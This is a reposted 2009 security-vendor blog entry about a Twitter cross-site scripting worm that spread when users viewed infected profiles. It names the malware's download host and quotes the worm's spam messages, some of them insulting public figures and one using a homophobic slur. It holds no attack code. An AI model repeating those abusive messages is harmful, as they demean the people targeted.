Yet another Twitter worm

[David Baxter PhD]

Yet another Twitter worm
by Patrik, F-Secure
April 17, 2009

A new Twitter cross-site scripting worm is going around on Twitter. Just like the previous Twitter worms it talks about Mikeey.

Other messages used by the worm is:

• Twitter, this sucks! Fix your coding.
• Twitter Security Team Really? You need to be fired.
• Horrible Coding!
• @oprah - sup? welcome to twitter - mikeyy
• @aplusk - hey, homo. - mikeyy
• @souljaboyellem - your music sucks dude. - mikeyy
• @TheEllenShow - hey baby, love me long time? - mikeyy
• @StephenColbert - you funny. - mikeyy
• @cnnbrk - he's back. - mikeyy
• @nytimes - yep, it's true. - mikeyy
• Twitter, do you know about the before_save model callback? - mikeyy
• This exploit only affects Internet Explorer users. Thanks. - mikeyy
• Twitter, BeforeSave: ForEach: DataArray: EscapeHtmlCars! - mikeyy
• Get Firefox, thanks. Firefox web browser | Faster, more secure, & customizable
• Twitter, you should be paying me now. - mikeyy

Once a user views an already infected profile they get infected as well. The name, location, website and bio all gets changed to Mikeyy and they start posting messages randomly picked from the list above.

The malicious script itself is downloaded from 74.200.253.195. Twitter is working on fixing the problem.

This happens on the same day as media reports that Michael Mooney got a job because of him writing the first Twitter worms. So if he did this one too, what was the motivation? To get an even better offer from someone else! Stupid.

For now, stay away from looking at user's profiles. Firefox and NoScripts is a good combo.

Updated to add: Michael Mooney (Mikeey) confesses to writing this latest worm as well.